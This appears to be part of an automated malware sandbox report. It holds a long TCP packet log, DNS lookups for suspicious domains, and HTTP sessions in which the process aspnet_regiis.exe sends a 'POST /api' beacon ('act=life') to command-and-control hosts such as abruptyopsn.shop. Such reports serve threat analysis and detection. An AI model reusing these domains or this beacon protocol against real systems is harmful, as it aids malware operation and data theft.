                                                                                        Dec 31, 2024 17:39:46.342410088 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:39:46.342423916 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.812777042 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.812876940 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:39:46.814454079 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:39:46.814469099 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.814708948 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.824876070 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:39:46.824876070 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:39:46.824956894 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:07.873836994 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:07.873944044 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:07.874030113 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:07.875411034 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:07.875432968 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:07.875444889 CET49898443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:07.875461102 CET44349898104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:07.885900021 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:07.885950089 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:07.886059046 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:07.886385918 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:07.886401892 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.343621016 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.343880892 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.345789909 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.345797062 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.346203089 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.347548008 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.347572088 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.347625017 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.799804926 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.799859047 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.799891949 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.799892902 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.799920082 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.799959898 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.799964905 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.799973965 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.800031900 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.800381899 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.800450087 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.800484896 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.800484896 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.800496101 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.800529003 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.800534964 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.801140070 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.801173925 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.801181078 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.844398975 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.886297941 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886354923 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886382103 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886406898 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.886424065 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886461973 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.886471033 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886522055 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886558056 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.886836052 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.886848927 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:08.886862040 CET49986443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:08.886867046 CET44349986104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:09.052171946 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.052234888 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:09.052304029 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.052659988 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.052671909 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:09.507761955 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:09.507842064 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.509182930 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.509196997 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:09.509512901 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:09.510802031 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.510977030 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:09.511019945 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.010354042 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.010452032 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.010560989 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.010770082 CET49988443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.010790110 CET44349988104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.236289024 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.236346960 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.236433029 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.236787081 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.236800909 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.734255075 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.734503031 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.736303091 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.736313105 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.737426996 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.738775969 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.739008904 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.739042997 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:10.739101887 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:10.783329010 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.254245043 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.254379988 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.254479885 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.254679918 CET49989443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.254693985 CET44349989104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.473458052 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.473517895 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.473603010 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.473942041 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.473958969 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.943928003 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.944071054 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.945420027 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.945436954 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.945678949 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.946904898 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.947051048 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.947084904 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:11.947154045 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:11.947164059 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:12.571788073 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:12.571897984 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:12.571980000 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:12.572299957 CET49990443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:12.572316885 CET44349990104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.052015066 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.052059889 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.052134037 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.052464962 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.052476883 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.518884897 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.518980026 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.520432949 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.520438910 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.520667076 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.521966934 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.522826910 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.522845984 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.522947073 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.522964001 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523071051 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523113012 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523245096 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523262978 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523431063 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523451090 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523600101 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523617983 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523629904 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523638964 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523762941 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523782015 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.523890018 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.523999929 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.524023056 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533394098 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.533548117 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533569098 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.533580065 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533593893 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.533612967 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533621073 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.533641100 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533649921 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.533700943 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533715010 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:13.533766031 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:13.533775091 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.087980032 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.088069916 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.088143110 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.088366032 CET49991443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.088382959 CET44349991104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.225975037 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.226008892 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.226330996 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.226445913 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.226450920 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.682997942 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.683126926 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.684710026 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.684717894 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.684947014 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:16.686331034 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.686419010 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:16.686424971 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:17.146128893 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:17.146229029 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:17.146310091 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:17.146616936 CET49992443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:17.146630049 CET44349992104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:17.692053080 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:17.692116022 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:17.692251921 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:17.692656040 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:17.692673922 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.160321951 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.160408020 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.162024021 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.162039995 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.162266970 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.182149887 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.182915926 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.182960987 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.183073044 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.183100939 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.183244944 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.183284044 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.183475018 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.183506012 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.185506105 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.185542107 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.191556931 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.191595078 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.191608906 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.191625118 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.191827059 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.191848993 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.191879034 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.193085909 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.193281889 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.193319082 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.193344116 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.193375111 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.195450068 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.195487976 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.198009968 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:18.198101044 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:18.198123932 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:20.847961903 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:20.848071098 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:20.848160982 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:20.848392010 CET49993443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:20.848412991 CET44349993104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:20.858953953 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:20.858985901 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:20.859091997 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:20.859460115 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:20.859467030 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.336060047 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.336199999 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.337666035 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.337673903 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.337901115 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.339247942 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.339274883 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.339329004 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794138908 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794184923 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794219017 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794245005 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794270039 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794287920 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.794287920 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.794305086 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794342995 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.794348955 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794395924 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794431925 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.794437885 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794703007 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794733047 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794749975 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.794754982 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794786930 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.794790983 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794866085 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.794905901 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.795150995 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.795161963 CET44349994104.21.96.1192.168.2.6
                                                                                        Dec 31, 2024 17:40:21.795172930 CET49994443192.168.2.6104.21.96.1
                                                                                        Dec 31, 2024 17:40:21.795177937 CET44349994104.21.96.1192.168.2.6
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:39:14.247349024 CET5038453192.168.2.61.1.1.1
                                                                                        Dec 31, 2024 17:39:14.270442963 CET53503841.1.1.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.244580984 CET5761653192.168.2.61.1.1.1
                                                                                        Dec 31, 2024 17:39:46.327467918 CET53576161.1.1.1192.168.2.6
                                                                                        Dec 31, 2024 17:39:46.331181049 CET5701653192.168.2.61.1.1.1
                                                                                        Dec 31, 2024 17:39:46.340868950 CET53570161.1.1.1192.168.2.6
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:39:14.247349024 CET192.168.2.61.1.1.10x9096Standard query (0)undesirabkel.clickA (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.244580984 CET192.168.2.61.1.1.10x8d65Standard query (0)nearycrepso.shopA (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.331181049 CET192.168.2.61.1.1.10x1de4Standard query (0)abruptyopsn.shopA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:39:14.270442963 CET1.1.1.1192.168.2.60x9096No error (0)undesirabkel.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:14.270442963 CET1.1.1.1192.168.2.60x9096No error (0)undesirabkel.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.327467918 CET1.1.1.1192.168.2.60x8d65Name error (3)nearycrepso.shopnonenoneA (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:39:46.340868950 CET1.1.1.1192.168.2.60x1de4No error (0)abruptyopsn.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                        • undesirabkel.click
                                                                                        • abruptyopsn.shop
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649709188.114.97.34434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:39:15 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:39:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.649898104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:39:46 UTC263OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:39:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-31 16:40:07 UTC1123INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=3db4vcl9re1h32s5ju7htqd5i3; expires=Sat, 26 Apr 2025 10:26:46 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
